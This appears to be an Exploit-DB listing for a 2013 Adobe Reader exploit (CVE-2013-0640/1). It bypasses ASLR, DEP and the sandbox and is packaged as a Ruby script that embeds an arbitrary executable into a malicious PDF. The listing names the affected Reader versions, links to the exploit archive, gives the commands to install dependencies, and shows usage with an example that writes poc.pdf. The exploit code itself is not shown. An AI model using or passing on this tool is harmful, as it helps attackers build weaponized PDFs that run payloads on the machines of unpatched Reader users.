Adobe Acrobat Reader – ASLR + DEP Bypass with Sandbox Bypass

  • Author: w3bd3vil & abh1sek
    Date: 2013-11-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/29881/
  • CVE-2013-0640/1
    Somehow, our script got on to the Russian forums :/
    
    @w3bd3vil and @abh1sek
    
    Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29881.tar.gz
    
    Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS
    =================================================================
    
    Supported Adobe Reader Versions:
    
    * 11.0.1
    * 11.0.0
    
    * 10.1.5
    * 10.1.4
    * 10.1.3
    * 10.1.2
    * 10.1
    
    * 9.5
    
    Tested on:
    
    * Windows 7 (32 bit)
    * Windows 7 (64 bit)
    * Windows XP
    
    Script Requirements:
    
    * Run on Windows :-)
    * Ruby 1.9.x (http://rubyforge.org/frs/download.php/76752/rubyinstaller-1.9.3-p385.exe)
    * Gems: origami, metasm (in a command prompt, type: gem install metasm && gem install origami -v "=1.2.5")
    
    FYI:
    a. It's a rip of the original exploit.
    b. Works most of the time.
    c. We never really got into completing our script options though.
    
    ruby xfa_MAGIC.rb -h
    Usage: xfa_MAGIC.rb [options]
        -i, --input [FILE]     Input PDF. If provided, exploit will be injected into it (optional)
        -p, --payload [FILE]   PE executable to embed in the payload
            --low-mem          Use heap spray suitable for low memory environment
        -o, --output [FILE]    File path to write output PDF
        -h, --help             Show help
    (Some commands are not supported at the moment)
    
    ruby xfa_MAGIC.rb -p example.exe -o poc.pdf